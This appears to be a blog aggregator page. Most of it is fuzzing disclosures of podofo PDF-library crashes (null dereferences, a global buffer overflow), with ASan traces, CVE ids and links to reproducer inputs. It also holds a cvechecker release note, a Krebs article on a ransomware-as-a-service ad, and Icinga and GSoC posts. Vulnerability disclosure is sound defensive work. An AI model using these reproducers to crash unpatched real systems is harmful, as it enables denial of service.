
Note:
This bug was found with American Fuzzy Lop.

Permalink:

podofo: NULL pointer dereference in PoDoFo::PdfColorGray::~PdfColorGray (PdfColor.cpp)

Top

podofo: NULL pointer dereference in PoDoFo::PdfXObject::PdfXObject (PdfXObject.cpp)

Postby ago via agostino's blog »

Description:
podofo is a C++ library to work with the PDF file format.

A fuzz on it discovered a null pointer dereference. The upstream project denies me to open a new ticket. So, I just will forward this on the -users mailing list.

The complete ASan output:

# podofocolor dummy $FILE foo
==21036==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7fc5cfd94743 bp 0x7ffc1eaffe50 sp 0x7ffc1eaffd40 T0)
==21036==The signal is caused by a READ memory access.
==21036==Hint: address points to the zero page.
    #0 0x7fc5cfd94742 in PoDoFo::PdfXObject::PdfXObject(PoDoFo::PdfObject*) /tmp/portage/app-text/podofo-0.9.5/work/podofo-0.9.5/src/doc/PdfXObject.cpp:264:74
    #1 0x529308 in ColorChanger::start() /tmp/portage/app-text/podofo-0.9.5/work/podofo-0.9.5/tools/podofocolor/colorchanger.cpp:137:28
    #2 0x523b8d in main /tmp/portage/app-text/podofo-0.9.5/work/podofo-0.9.5/tools/podofocolor/podofocolor.cpp:116:12
    #3 0x7fc5cd8d178f in __libc_start_main /tmp/portage/sys-libs/glibc-2.23-r3/work/glibc-2.23/csu/../csu/libc-start.c:289
    #4 0x4300e8 in _start (/usr/bin/podofocolor+0x4300e8)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /tmp/portage/app-text/podofo-0.9.5/work/podofo-0.9.5/src/doc/PdfXObject.cpp:264:74 in PoDoFo::PdfXObject::PdfXObject(PoDoFo::PdfObject*)
==21036==ABORTING
Affected version:
0.9.5

Fixed version:
N/A

Commit fix:
N/A

Credit:
This bug was discovered by Agostino Sarubbo of Gentoo.

CVE:
CVE-2017-6848

Reproducer:
https://github.com/asarubbo/poc/blob/master/00214-podofo-nullptr-PdfXObject-cpp

Timeline:
2017-03-01: bug discovered
2017-03-02: bug reported upstream
2017-03-02: blog post about the issue
2017-03-12: CVE assigned

Note:
This bug was found with American Fuzzy Lop.

Permalink:

podofo: NULL pointer dereference in PoDoFo::PdfXObject::PdfXObject (PdfXObject.cpp)

Top

podofo: NULL pointer dereference in PoDoFo::PdfVariant::DelayedLoad (PdfVariant.h)

Postby ago via agostino's blog »

Description:
podofo is a C++ library to work with the PDF file format.

A fuzz on it discovered a null pointer dereference. The upstream project denies me to open a new ticket. So, I just will forward this on the -users mailing list.

The complete ASan output:

# podofocolor dummy $FILE foo
==5768==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000018 (pc 0x7f6504f1742c bp 0x7fffc41a0df0 sp 0x7fffc41a0d00 T0)
==5768==The signal is caused by a READ memory access.
==5768==Hint: address points to the zero page.
    #0 0x7f6504f1742b in PoDoFo::PdfVariant::DelayedLoad() const /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/src/base/PdfVariant.h:545:10
    #1 0x7f6504f1742b in PoDoFo::PdfVariant::GetArray() /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/src/base/PdfVariant.h:795
    #2 0x7f6504f1742b in PoDoFo::PdfXObject::PdfXObject(PoDoFo::PdfObject*) /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/src/doc/PdfXObject.cpp:264
    #3 0x51ff55 in ColorChanger::start() /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/colorchanger.cpp:137:28
    #4 0x51c06d in main /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/podofocolor.cpp:116:12
    #5 0x7f650358c61f in __libc_start_main /var/tmp/portage/sys-libs/glibc-2.22-r4/work/glibc-2.22/csu/libc-start.c:289
    #6 0x428718 in _start (/usr/bin/podofocolor+0x428718)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/src/base/PdfVariant.h:545:10 in PoDoFo::PdfVariant::DelayedLoad() const
==5768==ABORTING
Affected version:
0.9.4

Fixed version:
N/A

Commit fix:
N/A

Credit:
This bug was discovered by Agostino Sarubbo of Gentoo.

CVE:
CVE-2017-6847

Reproducer:
https://github.com/asarubbo/poc/blob/master/00174-podofo-nullptr-PoDoFo-PdfVariant-DelayedLoad

Timeline:
2017-02-13: bug discovered
2017-03-02: bug reported to upstream
2017-03-02: blog post about the issue
2017-03-12: CVE assigned

Note:
This bug was found with American Fuzzy Lop.

Permalink:

podofo: NULL pointer dereference in PoDoFo::PdfVariant::DelayedLoad (PdfVariant.h)

Top

podofo: NULL pointer dereference in GraphicsStack::TGraphicsStackElement::SetNonStrokingColorSpace (graphicsstack.h)

Postby ago via agostino's blog »

Description:
podofo is a C++ library to work with the PDF file format.

A fuzz on it discovered a null pointer dereference. The upstream project denies me to open a new ticket. So, I just will forward this on the -users mailing list.

The complete ASan output:

# podofocolor dummy $FILE foo
==32192==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000525f24 bp 0x7ffe0a1fdc90 sp 0x7ffe0a1fdc00 T0)
==32192==The signal is caused by a READ memory access.
==32192==Hint: address points to the zero page.
    #0 0x525f23 in GraphicsStack::TGraphicsStackElement::SetNonStrokingColorSpace(PoDoFo::EPdfColorSpace) /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/graphicsstack.h:83:38
    #1 0x525f23 in GraphicsStack::SetNonStrokingColorSpace(PoDoFo::EPdfColorSpace) /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/graphicsstack.h:129
    #2 0x525f23 in ColorChanger::ProcessColor(ColorChanger::EKeywordType, int, std::vector<PoDoFo::PdfVariant, std::allocator >&, GraphicsStack&) /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/colorchanger.cpp:478
    #3 0x521b3c in ColorChanger::ReplaceColorsInPage(PoDoFo::PdfCanvas*) /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/colorchanger.cpp:214:31
    #4 0x51ed8e in ColorChanger::start() /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/colorchanger.cpp:120:15
    #5 0x51c06d in main /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/podofocolor.cpp:116:12
    #6 0x7fc21680761f in __libc_start_main /var/tmp/portage/sys-libs/glibc-2.22-r4/work/glibc-2.22/csu/libc-start.c:289
    #7 0x428718 in _start (/usr/bin/podofocolor+0x428718)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/graphicsstack.h:83:38 in GraphicsStack::TGraphicsStackElement::SetNonStrokingColorSpace(PoDoFo::EPdfColorSpace)
==32192==ABORTING
Affected version:
0.9.4

Fixed version:
N/A

Commit fix:
N/A

Credit:
This bug was discovered by Agostino Sarubbo of Gentoo.

CVE:
CVE-2017-6846

Reproducer:
https://github.com/asarubbo/poc/blob/master/00173-podofo-nullptr-GraphicsStack-TGraphicsStackElement-SetNonStrokingColorSpace

Timeline:
2017-02-13: bug discovered
2017-03-02: bug reported to upstream
2017-03-02: blog post about the issue
2017-03-12: CVE assigned

Note:
This bug was found with American Fuzzy Lop.

Permalink:

podofo: NULL pointer dereference in GraphicsStack::TGraphicsStackElement::SetNonStrokingColorSpace (graphicsstack.h)

Top

podofo: NULL pointer dereference in PoDoFo::PdfColor::operator= (PdfColor.cpp)

Postby ago via agostino's blog »

Description:
podofo is a C++ library to work with the PDF file format.

A fuzz on it discovered a null pointer dereference. The upstream project denies me to open a new ticket. So, I just will forward this on the -users mailing list.

The complete ASan output:

# podofocolor dummy $FILE foo
==9554==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000004ca47d bp 0x7fff58eb6bb0 sp 0x7fff58eb6330 T0)
==9554==The signal is caused by a READ memory access.
==9554==Hint: address points to the zero page.
    #0 0x4ca47c in AddressIsPoisoned /tmp/portage/sys-devel/llvm-3.9.0-r1/work/llvm-3.9.0.src/projects/compiler-rt/lib/asan/asan_mapping.h:321
    #1 0x4ca47c in QuickCheckForUnpoisonedRegion /tmp/portage/sys-devel/llvm-3.9.0-r1/work/llvm-3.9.0.src/projects/compiler-rt/lib/asan/asan_interceptors.cc:43
    #2 0x4ca47c in __asan_memcpy /tmp/portage/sys-devel/llvm-3.9.0-r1/work/llvm-3.9.0.src/projects/compiler-rt/lib/asan/asan_interceptors.cc:413
    #3 0x7f5fc924b58d in PoDoFo::PdfColor::operator=(PoDoFo::PdfColor const&) /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/src/base/PdfColor.cpp:575:9
    #4 0x52d31f in GraphicsStack::TGraphicsStackElement::operator=(GraphicsStack::TGraphicsStackElement const&) /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/graphicsstack.h:46:29
    #5 0x52d31f in GraphicsStack::TGraphicsStackElement::TGraphicsStackElement(GraphicsStack::TGraphicsStackElement const&) /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/graphicsstack.h:41
    #6 0x52c46a in GraphicsStack::Push() /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/graphicsstack.cpp:40:27
    #7 0x522005 in ColorChanger::ReplaceColorsInPage(PoDoFo::PdfCanvas*) /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/colorchanger.cpp:187:35
    #8 0x51ed8e in ColorChanger::start() /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/colorchanger.cpp:120:15
    #9 0x51c06d in main /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/podofocolor.cpp:116:12
    #10 0x7f5fc7d3261f in __libc_start_main /var/tmp/portage/sys-libs/glibc-2.22-r4/work/glibc-2.22/csu/libc-start.c:289
    #11 0x428718 in _start (/usr/bin/podofocolor+0x428718)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /tmp/portage/sys-devel/llvm-3.9.0-r1/work/llvm-3.9.0.src/projects/compiler-rt/lib/asan/asan_mapping.h:321 in AddressIsPoisoned
==9554==ABORTING
Affected version:
0.9.4

Fixed version:
N/A

Commit fix:
N/A

Credit:
This bug was discovered by Agostino Sarubbo of Gentoo.

CVE:
CVE-2017-6845

Reproducer:
https://github.com/asarubbo/poc/blob/master/00172-podofo-nullptr-PoDoFo-PdfColor-operator

Timeline:
2017-02-13: bug discovered
2017-03-02: bug reported to upstream
2017-03-02: blog post about the issue
2017-03-12: CVE assigned

Note:
This bug was found with American Fuzzy Lop.

Permalink:

podofo: NULL pointer dereference in PoDoFo::PdfColor::operator= (PdfColor.cpp)

Top

podofo: global buffer overflow in PoDoFo::PdfParser::ReadXRefSubsection (PdfParser.cpp)

Postby ago via agostino's blog »

Description:
podofo is a C++ library to work with the PDF file format.

A fuzz on it discovered a global overflow. The upstream project denies me to open a new ticket. So, I just will forward this on the -users mailing list.

The complete ASan output:

# podofocolor dummy $FILE foo
==15599==ERROR: AddressSanitizer: global-buffer-overflow on address 0x0000014a5838 at pc 0x0000004ca58c bp 0x7ffebe3248b0 sp 0x7ffebe324060
WRITE of size 24 at 0x0000014a5838 thread T0
    #0 0x4ca58b in __asan_memcpy /tmp/portage/sys-devel/llvm-3.9.0-r1/work/llvm-3.9.0.src/projects/compiler-rt/lib/asan/asan_interceptors.cc:413
    #1 0x7efe75862464 in void std::_Construct(PoDoFo::PdfParser::TXRefEntry*, PoDoFo::PdfParser::TXRefEntry const&) /usr/lib/gcc/x86_64-pc-linux-gnu/4.9.3/include/g++-v4/bits/stl_construct.h:83:38
    #2 0x7efe75862464 in void std::__uninitialized_fill_n::__uninit_fill_n(PoDoFo::PdfParser::TXRefEntry*, unsigned long, PoDoFo::PdfParser::TXRefEntry const&) /usr/lib/gcc/x86_64-pc-linux-gnu/4.9.3/include/g++-v4/bits/stl_uninitialized.h:202
    #3 0x7efe75862464 in void std::uninitialized_fill_n(PoDoFo::PdfParser::TXRefEntry*, unsigned long, PoDoFo::PdfParser::TXRefEntry const&) /usr/lib/gcc/x86_64-pc-linux-gnu/4.9.3/include/g++-v4/bits/stl_uninitialized.h:244
    #4 0x7efe75862464 in void std::__uninitialized_fill_n_a(PoDoFo::PdfParser::TXRefEntry*, unsigned long, PoDoFo::PdfParser::TXRefEntry const&, std::allocator&) /usr/lib/gcc/x86_64-pc-linux-gnu/4.9.3/include/g++-v4/bits/stl_uninitialized.h:355
    #5 0x7efe75862464 in std::vector<PoDoFo::PdfParser::TXRefEntry, std::allocator >::_M_fill_insert(__gnu_cxx::__normal_iterator<PoDoFo::PdfParser::TXRefEntry*, std::vector<PoDoFo::PdfParser::TXRefEntry, std::allocator > >, unsigned long, PoDoFo::PdfParser::TXRefEntry const&) /usr/lib/gcc/x86_64-pc-linux-gnu/4.9.3/include/g++-v4/bits/vector.tcc:496
    #6 0x7efe75855a47 in std::vector<PoDoFo::PdfParser::TXRefEntry, std::allocator >::insert(__gnu_cxx::__normal_iterator<PoDoFo::PdfParser::TXRefEntry*, std::vector<PoDoFo::PdfParser::TXRefEntry, std::allocator > >, unsigned long, PoDoFo::PdfParser::TXRefEntry const&) /usr/lib/gcc/x86_64-pc-linux-gnu/4.9.3/include/g++-v4/bits/stl_vector.h:1073:9
    #7 0x7efe75855a47 in std::vector<PoDoFo::PdfParser::TXRefEntry, std::allocator >::resize(unsigned long, PoDoFo::PdfParser::TXRefEntry) /usr/lib/gcc/x86_64-pc-linux-gnu/4.9.3/include/g++-v4/bits/stl_vector.h:716
    #8 0x7efe75855a47 in PoDoFo::PdfParser::ReadXRefSubsection(long&, long&) /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/src/base/PdfParser.cpp:772
    #9 0x7efe758470ad in PoDoFo::PdfParser::ReadXRefContents(long, bool) /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/src/base/PdfParser.cpp:725:17
    #10 0x7efe75840a9e in PoDoFo::PdfParser::ReadDocumentStructure() /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/src/base/PdfParser.cpp:337:9
    #11 0x7efe7583de0f in PoDoFo::PdfParser::ParseFile(PoDoFo::PdfRefCountedInputDevice const&, bool) /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/src/base/PdfParser.cpp:220:9
    #12 0x7efe7583c1d4 in PoDoFo::PdfParser::ParseFile(char const*, bool) /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/src/base/PdfParser.cpp:164:11
    #13 0x7efe75a993f3 in PoDoFo::PdfMemDocument::Load(char const*) /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/src/doc/PdfMemDocument.cpp:186:16
    #14 0x7efe75a990c2 in PoDoFo::PdfMemDocument::PdfMemDocument(char const*) /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/src/doc/PdfMemDocument.cpp:88:11
    #15 0x51e96d in ColorChanger::start() /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/colorchanger.cpp:110:20
    #16 0x51c06d in main /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/podofocolor.cpp:116:12
    #17 0x7efe7424861f in __libc_start_main /var/tmp/portage/sys-libs/glibc-2.22-r4/work/glibc-2.22/csu/libc-start.c:289
    #18 0x428718 in _start (/usr/bin/podofocolor+0x428718)

0x0000014a5838 is located 0 bytes to the right of global variable 'PoDoFo::PODOFO_BUILTIN_FONTS' defined in '/tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/src/doc/PdfFontFactoryBase14Data.h:4460:33' (0x14a4aa0) of size 3480
SUMMARY: AddressSanitizer: global-buffer-overflow /tmp/portage/sys-devel/llvm-3.9.0-r1/work/llvm-3.9.0.src/projects/compiler-rt/lib/asan/asan_interceptors.cc:413 in __asan_memcpy
Shadow bytes around the buggy address:
  0x00008028cab0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x00008028cac0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x00008028cad0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x00008028cae0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x00008028caf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x00008028cb00: 00 00 00 00 00 00 00[f9]f9 f9 f9 f9 f9 f9 f9 f9
  0x00008028cb10: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
  0x00008028cb20: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
  0x00008028cb30: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
  0x00008028cb40: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
  0x00008028cb50: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==15599==ABORTING
Affected version:
0.9.4

Fixed version:
N/A

Commit fix:
N/A

Credit:
This bug was discovered by Agostino Sarubbo of Gentoo.

CVE:
CVE-2017-6844

Reproducer:
https://github.com/asarubbo/poc/blob/master/00171-podofo-globaloverflow-PoDoFo-PdfParser-ReadXRefSubsection

Timeline:
2017-02-13: bug discovered
2017-03-02: bug reported to upstream
2017-03-02: blog post about the issue
2017-03-12: CVE assigned

Note:
This bug was found with American Fuzzy Lop.

Permalink:

podofo: global buffer overflow in PoDoFo::PdfParser::ReadXRefSubsection (PdfParser.cpp)

Top

cvechecker 3.7 released

Postby Sven Vermeulen via Simplicity is a form of art... »

After a long time of getting too little attention from me, I decided to make a new cvechecker release. There are few changes in it, but I am planning on making a new release soon with lots of clean-ups.

What has been changed

So, what has changed? With this release (now at version 3.7) two bugs have been fixed, one having a wrong URL in the CVE download and the other about the CVE sequence numbers.

The first bug was an annoying one, which I should have fixed a long time ago. Well, it was fixed in the repository, but I didn't make a new release for it. When downloading the nvdcve-2.0-Modified.xml file, the pullcves command used the lowercase filename, which doesn't exist.

The second bug is about parsing the CVE sequence. On January 2014 the syntax changed to allow for sequence identifiers longer than 4 digits. The cvechecker tool however did a hard validation on the length of the identifier, and cut off longer fields.

That means that some CVE reports failed to parse in cvechecker, and thus cvechecker didn't "know" about these vulnerabilities. This has been fixed in this release, although I am not fully satisfied...

What still needs to be done

The codebase for cvechecker is from 2010, and is actually based on a prototype that I wrote which I decided not to rewrite into proper code. As a result, the code is not up to par.

I'm going to gradually improve and clean up the code in the next few [insert timeperiod here]. I don't know if there will be feature improvements in the next few releases (not that there aren't many feature enhancements needed) but I hope that, once the code is improved, new functionality can be added more easily.

But that's for another time. Right now, enjoy the new release.
Top

Ransomware for Dummies: Anyone Can Do It

Postby BrianKrebs via Krebs on Security »

Among today’s fastest-growing cybercrime epidemics is “ransomware,” malicious software that encrypts your computer files, photos, music and documents and then demands payment in Bitcoin to recover access to the files. A big reason for the steep increase in ransomware attacks in recent years comes from the proliferation of point-and-click tools sold in the cybercrime underground that make it stupid simple for anyone to begin extorting others for money.

Recently, I came across an extremely slick and professionally produced video advertisement promoting the features and usability of “Philadelphia,” a ransomware-as-a-service crimeware package that is sold for roughly $400 to would-be cybercriminals who dream of carving out their own ransomware empires.

This stunning advertisement does a thorough job of showcasing Philadelphia’s many features, including the ability to generate PDF reports and charts of victims “to track your malware campaigns” as well as the ability to plot victims around the world using Google Maps.

“Everything just works,” claim the proprietors of Philadelphia. “Get your lifetime copy. One payment. Free updates. No monthly fees.”

One interesting feature of this ransomware package is the ability to grant what the program’s architects call “mercy.” This refers to the desperate and heartbreaking pleas that ransomware purveyors often hear from impecunious victims whose infections have jeopardized some priceless and irreplaceable data — such as photos of long lost loved ones.

I’ll revisit the authors of this ransomware package in a future post. For now, just check out their ad. It’s fairly chilling.

Top

Using CRLs in Icinga 2

Postby Sebastian Marsching via Open Source, Physics & Politics »

Icinga 2.x offers a cluster mode which (from an administrator's point of view) is one of the most important features introduces with the 2.x release. Using the cluster feature, check commands can be executed on satellite nodes or even the complete scheduling of checks can be delegated to other nodes, while still keeping the configuration in a single place.

In order to enable secure communication within the cluster, Icinga 2 uses a public key infrastructure (PKI). This PKI can be managed with the icinga2 pki commands. However, there is no command for generating a CRL. For this reason, it is necessary to use the openssl ca command for generating a CRL. I have documented the steps necessary for generating a CRL in my wiki.

Funnily, it seems like no one has used a CRL in Icinga 2 so far. I know this, because up to today, Icinga 2 has a bug that makes it impossible to load a CRL. Luckily, yours truly already fixed this bug and this bugfix is going to be included in the next Icinga 2 release.

I find it strange that obviously no one is using CRLs, because Icinga 2 uses a very long validity period when generating certificates (15 years), so it is quite likely that at some point a node is decommissioned and thus the corresponding certificate shall be removed.
Top

Gentoo is accepted to GSoC 2017

Postby calchan via Denis Dupeyron »

There was good news in my mailbox today. The Gentoo Foundation was accepted to be a mentor organization for Google Summer of Code 2017!

What this means is we need you as a mentor, backup mentor or expert mentor. Whether you are a Gentoo developer and have done GSoC before does not matter at this point.

A mentor is somebody who will help during the selection of students, and will mentor a student during the summer. This should take at most one hour of your time on weekdays when student actually work on their project. What’s in it for you, you ask? A pretty exclusive Google T-shirt, a minion who does things you wouldn’t have the time or energy to do, but most importantly gratification and a lot of fun.

Backup mentors are for when the primary mentor of a student becomes unavailable for an extended period, typically for medical or family reasons. It rarely happens but it does happen. But a backup mentor can also be an experienced mentor (i.e., have done it at least once) who assists a primary mentor who is doing it for the first time.

Expert mentors have a very specific knowledge and are contacted on an as-needed basis to help with technical decisions.

You can be any combination of all that. However, our immediate need in the coming weeks is for people (again, not necessarily mentors or devs) who will help us evaluate student proposals.

If you’re a student, it’s the right time now to start thinking about what project idea you would want to work on during the summer. You can find ideas on our dedicated page, or you can come up with yours (these are the best!). One note though: you are going to be working on this full-time (i.e., 8 hours a day, we don’t allow for another even part-time job next to GSoC, although we do accommodate students who have a limited amount of classes or exams) for 3 months, so make sure your idea can keep you busy for this long. Whether you pick one of our ideas or come up with yours, it is strongly recommended to start discussing it with us on IRC.

As usual, we’d love to chat with you or answer your questions in #gentoo-soc on Freenode IRC. Make sure you stay long enough in the channel and give us enough time to respond to you. We are all volunteers and can’t maintain a 24/7 presence. It can take up to a few hours for one of us to see your request.
Top